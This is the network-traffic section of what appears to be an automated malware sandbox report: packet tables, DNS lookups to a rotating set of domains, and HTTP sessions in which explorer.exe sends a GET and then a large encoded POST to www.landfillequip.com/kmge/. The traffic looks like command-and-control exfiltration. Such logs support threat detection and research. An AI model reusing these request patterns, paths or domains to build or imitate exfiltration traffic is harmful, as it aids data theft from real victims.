Aug 30, 2024 07:27:45.053699970 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.059278965 CEST	80	49725	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.059297085 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.059346914 CEST	49725	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.059385061 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.061350107 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066148043 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066198111 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066231012 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066241980 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066271067 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066281080 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066310883 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066320896 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066358089 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066431046 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066441059 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066448927 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.066476107 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.066494942 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.068943024 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.068981886 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.068996906 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.069022894 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.071027040 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071073055 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.071096897 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071137905 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.071141958 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071151018 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071161032 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071202993 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.071214914 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.071266890 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.116657972 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.116755009 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.168698072 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.168755054 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.220666885 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.220722914 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.268686056 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.268744946 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.320652962 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.326365948 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.372661114 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.378057957 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.428675890 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.430129051 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.432519913 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.437391996 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437401056 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437418938 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437427044 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437452078 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437470913 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437508106 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.437530041 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437535048 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.437539101 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437551022 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437577963 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437587023 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437602043 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437628984 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.437671900 CEST	49726	80	192.168.2.6	204.11.56.48
Aug 30, 2024 07:27:45.437706947 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437737942 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437779903 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437793970 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437802076 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437839985 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437885046 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437938929 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.437947989 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438059092 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438201904 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438251972 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438292980 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438337088 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438385963 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438476086 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438484907 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.438515902 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442526102 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442657948 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442667961 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442776918 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442785978 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442795992 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442832947 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442878008 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.442969084 CEST	80	49726	204.11.56.48	192.168.2.6
Aug 30, 2024 07:27:45.443187952 CEST	49726	80	192.168.2.6	204.11.56.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 07:26:40.022857904 CEST	49153	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:26:40.049299955 CEST	53	49153	1.1.1.1	192.168.2.6
Aug 30, 2024 07:27:01.748656034 CEST	60822	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:27:02.102319956 CEST	53	60822	1.1.1.1	192.168.2.6
Aug 30, 2024 07:27:20.756216049 CEST	58961	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:27:20.766618967 CEST	53	58961	1.1.1.1	192.168.2.6
Aug 30, 2024 07:27:41.194340944 CEST	63533	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:27:42.193653107 CEST	63533	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:27:43.209410906 CEST	63533	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:27:44.535259962 CEST	53	63533	1.1.1.1	192.168.2.6
Aug 30, 2024 07:27:44.535275936 CEST	53	63533	1.1.1.1	192.168.2.6
Aug 30, 2024 07:27:44.535283089 CEST	53	63533	1.1.1.1	192.168.2.6
Aug 30, 2024 07:28:01.844919920 CEST	49318	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:28:01.853022099 CEST	53	49318	1.1.1.1	192.168.2.6
Aug 30, 2024 07:28:22.276213884 CEST	60310	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:28:22.284821033 CEST	53	60310	1.1.1.1	192.168.2.6
Aug 30, 2024 07:28:43.502558947 CEST	60135	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:28:43.511945009 CEST	53	60135	1.1.1.1	192.168.2.6
Aug 30, 2024 07:29:04.513395071 CEST	56693	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:29:04.522978067 CEST	53	56693	1.1.1.1	192.168.2.6
Aug 30, 2024 07:29:25.274631023 CEST	57787	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:29:25.431476116 CEST	53	57787	1.1.1.1	192.168.2.6
Aug 30, 2024 07:29:45.787688971 CEST	61900	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:29:45.802048922 CEST	53	61900	1.1.1.1	192.168.2.6
Aug 30, 2024 07:30:10.100613117 CEST	56649	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:30:10.111336946 CEST	53	56649	1.1.1.1	192.168.2.6
Aug 30, 2024 07:30:30.258188963 CEST	54061	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:30:30.289052963 CEST	53	54061	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 30, 2024 07:26:40.022857904 CEST	192.168.2.6	1.1.1.1	0x7d5a	Standard query (0)	www.icvp5o.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:01.748656034 CEST	192.168.2.6	1.1.1.1	0x6c38	Standard query (0)	www.bedbillionaire.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:20.756216049 CEST	192.168.2.6	1.1.1.1	0x620	Standard query (0)	www.mrawkward.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:41.194340944 CEST	192.168.2.6	1.1.1.1	0x791f	Standard query (0)	www.landfillequip.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:42.193653107 CEST	192.168.2.6	1.1.1.1	0x791f	Standard query (0)	www.landfillequip.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:43.209410906 CEST	192.168.2.6	1.1.1.1	0x791f	Standard query (0)	www.landfillequip.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:01.844919920 CEST	192.168.2.6	1.1.1.1	0xeae5	Standard query (0)	www.kickssoccercamp.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:22.276213884 CEST	192.168.2.6	1.1.1.1	0x262c	Standard query (0)	www.cq0jt.sbs	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:43.502558947 CEST	192.168.2.6	1.1.1.1	0x1fc6	Standard query (0)	www.hhe-crv220.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:04.513395071 CEST	192.168.2.6	1.1.1.1	0xc5c0	Standard query (0)	www.sacksmantenimiento.store	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:25.274631023 CEST	192.168.2.6	1.1.1.1	0x59dd	Standard query (0)	www.a2zglobalimports.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:45.787688971 CEST	192.168.2.6	1.1.1.1	0x9949	Standard query (0)	www.shearwaterpembrokeshire.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:30:10.100613117 CEST	192.168.2.6	1.1.1.1	0x4acc	Standard query (0)	www.sejasuapropriachefe.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:30:30.258188963 CEST	192.168.2.6	1.1.1.1	0xad29	Standard query (0)	www.n5l780.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 30, 2024 07:26:40.049299955 CEST	1.1.1.1	192.168.2.6	0x7d5a	Name error (3)	www.icvp5o.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:02.102319956 CEST	1.1.1.1	192.168.2.6	0x6c38	Name error (3)	www.bedbillionaire.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:20.766618967 CEST	1.1.1.1	192.168.2.6	0x620	Name error (3)	www.mrawkward.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:44.535259962 CEST	1.1.1.1	192.168.2.6	0x791f	No error (0)	www.landfillequip.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:44.535275936 CEST	1.1.1.1	192.168.2.6	0x791f	No error (0)	www.landfillequip.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:27:44.535283089 CEST	1.1.1.1	192.168.2.6	0x791f	No error (0)	www.landfillequip.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:01.853022099 CEST	1.1.1.1	192.168.2.6	0xeae5	Name error (3)	www.kickssoccercamp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:22.284821033 CEST	1.1.1.1	192.168.2.6	0x262c	Name error (3)	www.cq0jt.sbs	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:28:43.511945009 CEST	1.1.1.1	192.168.2.6	0x1fc6	Name error (3)	www.hhe-crv220.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:04.522978067 CEST	1.1.1.1	192.168.2.6	0xc5c0	Name error (3)	www.sacksmantenimiento.store	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:25.431476116 CEST	1.1.1.1	192.168.2.6	0x59dd	Name error (3)	www.a2zglobalimports.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:45.802048922 CEST	1.1.1.1	192.168.2.6	0x9949	No error (0)	www.shearwaterpembrokeshire.com	shearwaterpembrokeshire.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 07:29:45.802048922 CEST	1.1.1.1	192.168.2.6	0x9949	No error (0)	shearwaterpembrokeshire.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:29:45.802048922 CEST	1.1.1.1	192.168.2.6	0x9949	No error (0)	shearwaterpembrokeshire.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:30:10.111336946 CEST	1.1.1.1	192.168.2.6	0x4acc	Name error (3)	www.sejasuapropriachefe.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 07:30:30.289052963 CEST	1.1.1.1	192.168.2.6	0xad29	Name error (3)	www.n5l780.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.landfillequip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49725	204.11.56.48	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 07:27:44.541199923 CEST	181	OUT	GET /kmge/?9ryxAF1X=QP81EcQih7VsKdxvGCQICkK3NoxzpI9p/3Heqjlotj0m3GfPoWteGvRMVqRY4pahxYHvPZXphw==&sBZ4hH=X6X4HNUxL HTTP/1.1 Host: www.landfillequip.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49726	204.11.56.48	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 07:27:45.061350107 CEST	12360	OUT	POST /kmge/ HTTP/1.1 Host: www.landfillequip.com Connection: close Content-Length: 178702 Cache-Control: no-cache Origin: http://www.landfillequip.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.landfillequip.com/kmge/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 39 72 79 78 41 46 31 58 3d 59 74 77 50 61 36 39 41 6a 5f 34 64 57 5f 52 41 4d 79 64 77 53 44 4f 45 4a 35 52 51 68 4e 41 33 70 77 71 45 37 53 67 77 71 67 6f 7a 33 69 48 48 34 57 55 32 46 4b 73 51 47 37 6c 67 75 35 43 56 78 34 79 31 43 71 62 78 6a 77 45 74 56 51 61 5f 71 4c 77 58 65 57 31 35 45 65 41 77 77 5f 54 7a 79 75 63 31 31 38 59 39 32 65 65 37 45 39 58 6d 30 63 56 7a 33 47 49 53 43 62 77 48 57 46 50 44 77 30 36 65 32 54 49 70 4f 6f 34 6a 72 4e 31 67 44 55 69 33 75 44 69 48 50 32 48 78 28 6d 32 38 4a 6b 71 47 46 64 33 55 65 4f 6a 56 79 2d 35 5f 4f 59 63 4d 72 56 46 6e 53 4e 37 65 54 32 6d 7a 72 50 7a 47 6b 6f 31 76 59 45 30 6b 6f 6f 48 39 78 74 4e 2d 66 77 50 6c 72 4f 7e 62 33 4f 78 51 4c 6c 54 4a 6b 37 4a 69 37 6a 4a 51 63 62 33 30 4f 70 56 61 6b 37 64 49 70 73 49 4f 59 6c 54 4a 6f 32 6f 37 55 69 6d 56 77 6a 61 54 33 67 35 6a 6a 4f 68 48 4d 41 7e 39 4f 49 4b 67 76 53 55 4c 7e 77 44 49 71 65 50 6b 72 32 7e 4a 57 4e 45 6c 70 31 4e 76 58 5a 79 37 43 39 65 7a 61 31 57 56 32 59 4b 39 58 51 6b 47 38 [TRUNCATED] Data Ascii: 9ryxAF1X=YtwPa69Aj_4dW_RAMydwSDOEJ5RQhNA3pwqE7Sgwqgoz3iHH4WU2FKsQG7lgu5CVx4y1CqbxjwEtVQa_qLwXeW15EeAww_Tzyuc118Y92ee7E9Xm0cVz3GISCbwHWFPDw06e2TIpOo4jrN1gDUi3uDiHP2Hx(m28JkqGFd3UeOjVy-5_OYcMrVFnSN7eT2mzrPzGko1vYE0kooH9xtN-fwPlrO~b3OxQLlTJk7Ji7jJQcb30OpVak7dIpsIOYlTJo2o7UimVwjaT3g5jjOhHMA~9OIKgvSUL~wDIqePkr2~JWNElp1NvXZy7C9eza1WV2YK9XQkG8ThGJ59T9usPeBugJ5tchybkTZ9y3OXsx5RP4s1iQtcBWQQuhFanmGyrvwnItc2wxhAPnVMKQCHOFx5kfabv2Va3MaROr1Fz680IfbWqX16o8pTv1sPoBx42oOADHf5CPVU1SvHxRiQyDpy3h1owjDmgsR0BZ2(OX-V8BPUUQoKF8-1zNPVC6omKfEyXDApCW5wKwIrKFhx36-PY0yIcoVnKVq2jQO~7iqrkkRK_Rdnr~MCm1Ycmd3lk37i8cQJWw93DnztPvx9QLVzGZ-vOkaupqieCHW9YhQc5IyDuLMlHTrOnW21vSQexpisulbI5(6q_OqlW(kp-jAQCehGUPc1KaP~zBTIH494-ukyMabUfyUwFOkpae-TfI3vgw1KJPKk9iS8L9iNXH0ZlWg1OqNlji21owOuaWBxNYOzDIhjJxVX_FHdYpHR95d8yP6fIS2j_ewx45dxZftmuNszBtUNWuD1-1Y2ja3q0~WI8Iz~dm7hdPdaRcwi_QoYhDkOIa-IP2_lRE_RJId3LUgBg4LGKE63Unalu5rRC(Z0L3QMEgLaNveXLbnG90JzIr5D8LmQoO1EOLxD4~2MQAviN0IqfvsrLrQP_owxwoBnc9t6rmBFJhpCOVKbadPJZA1j7yBGRQgCHHXDvOZOd8dCgH0ID6XrE(c2S4GC [TRUNCATED]
Aug 30, 2024 07:27:45.066198111 CEST	2472	OUT	Data Raw: 6f 4d 64 74 37 76 43 56 4e 67 4b 62 5a 4f 66 38 45 54 30 6b 53 68 39 4f 41 62 70 56 51 68 30 6b 37 6d 4a 38 74 47 33 58 65 69 41 55 43 73 2d 68 54 6d 6d 71 5a 45 76 43 78 63 51 66 70 31 51 62 58 6f 4e 6e 76 54 65 6f 31 61 4c 54 72 52 58 74 63 48 Data Ascii: oMdt7vCVNgKbZOf8ET0kSh9OAbpVQh0k7mJ8tG3XeiAUCs-hTmmqZEvCxcQfp1QbXoNnvTeo1aLTrRXtcH3rts07-7LyKcQ3Mz4ehGKBVMX7imamMaB3ZMGV3aeCEkOkN8HDQuemEJr8os2H4s0lxIGwrxs0enmfgPeMP0wkqdP42eh0RN4rQpM8ohb7Q3VsR45(Z2TEudPd0RiczTKJsp6DRqTHynayPFT2K~czvktROBgtGaO
Aug 30, 2024 07:27:45.066271067 CEST	2472	OUT	Data Raw: 65 57 36 54 6e 67 5a 55 55 4f 4f 64 4c 4a 43 33 76 52 38 45 4f 44 4c 68 62 43 4a 39 54 63 6c 74 67 5a 4b 34 59 35 42 42 4e 7e 32 56 43 63 69 4e 38 67 30 52 33 44 6a 69 68 51 48 56 49 71 2d 7e 65 30 5a 54 72 53 71 6e 77 75 4b 61 4c 52 35 6f 64 43 Data Ascii: eW6TngZUUOOdLJC3vR8EODLhbCJ9TcltgZK4Y5BBN~2VCciN8g0R3DjihQHVIq-~e0ZTrSqnwuKaLR5odCBF206mtOALp~vMin4AVpfq_5wY0N08sMxfHGZMMIWy1AdL-QA0WKpiUjW4NB1Fpugw1876zhtXOtgvHEAYOaz~0038CLdPLdjeOp0JIPFRKAFDHTAZDLga7VUjpKbLtElP3MKOQPAzX032UgmW-X1x6rve59s6uMq
Aug 30, 2024 07:27:45.066281080 CEST	2472	OUT	Data Raw: 43 4f 53 4c 74 7e 43 55 50 4a 65 46 77 62 77 46 6d 7a 42 4e 33 75 4f 39 4e 52 55 74 59 79 47 69 30 67 75 41 5f 5a 35 39 69 38 41 66 45 67 56 6d 38 51 55 53 50 64 4c 28 53 52 39 75 78 76 33 48 75 69 53 54 53 34 6e 6d 64 76 78 50 44 6e 43 46 4e 56 Data Ascii: COSLt~CUPJeFwbwFmzBN3uO9NRUtYyGi0guA_Z59i8AfEgVm8QUSPdL(SR9uxv3HuiSTS4nmdvxPDnCFNV6FxXLUeN3agaUCW~pWil9PVw8qaRhdUXIKNKaLIPhfTIEfFapPTYqEHGaNjnE08sd8mrH~FTqv8ps(hfHFTp1L1HBflJQqfPtNrfKhRtQn4WMZc6Pp6mamMxTsLkgga1g8h5QeW9mPlDJleVgNsG-ST9WE6(YFh18
Aug 30, 2024 07:27:45.066358089 CEST	4944	OUT	Data Raw: 61 63 4b 71 72 45 51 36 4a 43 5a 31 67 43 62 66 70 41 67 39 49 70 36 39 44 48 68 43 35 58 71 52 42 50 4c 70 6a 38 46 55 78 58 52 6d 4e 7e 4a 31 47 73 6e 72 65 58 32 71 38 41 74 4d 51 4b 5f 4c 34 46 37 63 34 36 67 4d 46 33 2d 6f 31 6c 73 5a 47 64 Data Ascii: acKqrEQ6JCZ1gCbfpAg9Ip69DHhC5XqRBPLpj8FUxXRmN~J1GsnreX2q8AtMQK_L4F7c46gMF3-o1lsZGdfuywGrEMnm857GOBS4g~fJJlZSlX4LfGMfAJQhs5xaYZzR8cWxJ2rLkJ4iJOxjvjCtyFnHwBrLpDIDOQ29kPCk2sVvXcWGLRyLE1wRBiksuUIgl634eeAyavEecOGxGYOQwi4RfYwyJD4hqqFW2YCaVBVeU5HfSlt
Aug 30, 2024 07:27:45.066476107 CEST	2472	OUT	Data Raw: 4b 56 4d 68 43 78 6b 47 4b 31 59 30 4f 4d 4e 6c 50 35 47 64 55 34 75 42 56 79 76 77 6d 74 67 7a 33 75 43 65 47 53 42 37 46 31 53 7a 54 33 73 73 72 62 54 4e 78 7a 68 61 68 55 31 4c 43 6b 36 72 66 7a 33 51 34 28 30 41 75 42 75 54 70 68 47 41 79 57 Data Ascii: KVMhCxkGK1Y0OMNlP5GdU4uBVyvwmtgz3uCeGSB7F1SzT3ssrbTNxzhahU1LCk6rfz3Q4(0AuBuTphGAyWSf35S1QxOb91WraFR1D0II8SPNza64TynUI~N8fSm41COBPsHBqRtuMCHvXoAeV7Vfb3Tlh1rg0FSXnuF1GwjX4Fr9hq9dZjHO6LChb9vi4bl2IJrTwb7xjX5Z5PUmkFvZIWB9UNRjfdcZVKxgI0mSsJJtWdWGVU4
Aug 30, 2024 07:27:45.066494942 CEST	4944	OUT	Data Raw: 5a 4b 46 33 6a 32 75 68 5f 4f 44 65 50 54 54 56 65 57 75 41 41 42 46 34 44 61 6d 44 58 65 49 70 4a 4a 4f 43 2d 64 2d 36 50 51 32 58 36 65 46 43 49 67 7a 6f 65 59 42 48 70 4f 32 44 71 57 7a 77 69 56 46 70 55 5a 6d 44 56 6a 35 54 4c 4d 4b 30 74 52 Data Ascii: ZKF3j2uh_ODePTTVeWuAABF4DamDXeIpJJOC-d-6PQ2X6eFCIgzoeYBHpO2DqWzwiVFpUZmDVj5TLMK0tRL7cUWghh2J5hLKzBw7Lf-PU07s8gg3IK56t6-eu(Y6WQT8wVz39mfJ3XgaD3bx3SmJHMXIHq-xkvVqxUDxmqYOKkOd67twzSJ0YyOVx1jkmLsLyrfwG3FN508GCOJ~qYP7hFiYAnQJq~5kcxefIyZaxFy2OyHHxjV
Aug 30, 2024 07:27:45.068996906 CEST	2472	OUT	Data Raw: 77 64 59 42 63 7a 65 31 4c 6c 4d 54 63 4f 4a 71 64 43 36 73 58 6c 48 67 33 76 32 28 39 5a 6f 50 55 33 70 71 33 75 34 67 6f 54 6f 65 52 64 76 38 42 59 72 57 55 63 70 63 4c 31 2d 56 75 72 4e 77 58 43 62 71 47 7e 6d 66 5f 66 34 32 70 71 63 6f 78 44 Data Ascii: wdYBcze1LlMTcOJqdC6sXlHg3v2(9ZoPU3pq3u4goToeRdv8BYrWUcpcL1-VurNwXCbqG~mf_f42pqcoxDQUDQXZPWN6Brx3vj-tWLVwjcCL-kMNo7hS2hj(CNDtV9qNGBTeH5tu-rRmptdELZePKsnh1GulUvzYKRiPCtPgL56lmfyl_DXxQLU6AfVWe8wTje5QeaHwrk_k32dLArsYkoR5RX4(aVJUR6XBNsxfkH78avVubNK
Aug 30, 2024 07:27:45.069022894 CEST	2472	OUT	Data Raw: 44 63 48 64 73 52 6c 52 37 52 33 34 50 35 41 6e 4c 6a 32 57 4f 47 46 47 6a 71 37 35 30 69 6a 73 77 70 57 59 65 64 4c 44 57 6c 63 39 4e 30 45 43 66 36 76 66 30 4c 55 42 54 61 61 57 6f 54 63 61 58 6b 51 47 33 75 57 70 69 33 4b 71 67 5a 6e 76 79 41 Data Ascii: DcHdsRlR7R34P5AnLj2WOGFGjq750ijswpWYedLDWlc9N0ECf6vf0LUBTaaWoTcaXkQG3uWpi3KqgZnvyAcrHi_o7aU0H~Qu14_XikUJkTjudRSYuVmvY3o272R6Km-I3hQr5t0KnBAjaHGS9qXp1izIUBhtgEfDgNDHVcbOp1IOzg0UMZxl4af(oj_jtv0aPqJR2qgVf0O4NiiH8~BIgNjN6U7swflby3DWV0gCevlu32d(YWG
Aug 30, 2024 07:27:45.071073055 CEST	2472	OUT	Data Raw: 4f 31 30 31 6d 35 63 70 33 77 53 6e 46 44 63 41 50 55 4a 41 55 64 77 4d 69 52 34 33 79 4d 68 36 38 6f 5f 28 55 6c 50 67 72 67 68 4f 42 47 55 7e 33 30 6e 30 54 28 35 67 50 46 56 37 68 43 66 41 4f 70 4f 70 37 63 35 37 4b 53 31 65 34 41 50 56 54 74 Data Ascii: O101m5cp3wSnFDcAPUJAUdwMiR43yMh68o_(UlPgrghOBGU~30n0T(5gPFV7hCfAOpOp7c57KS1e4APVTtsBph2TWpuPxHR4CxbQXbT(05Jt4mgXjFr(CIh(NgJ589OWW5EE5qj1jh7h_RATNV4uT3omrY6SXdldbuw4Z(XFmQRuOcXXmE5EMH6Vv1cX5JthQDPo4Xm16eUIbSwppix1t9GCAle4hGBuldYD8U3mitSEDQs(n7S
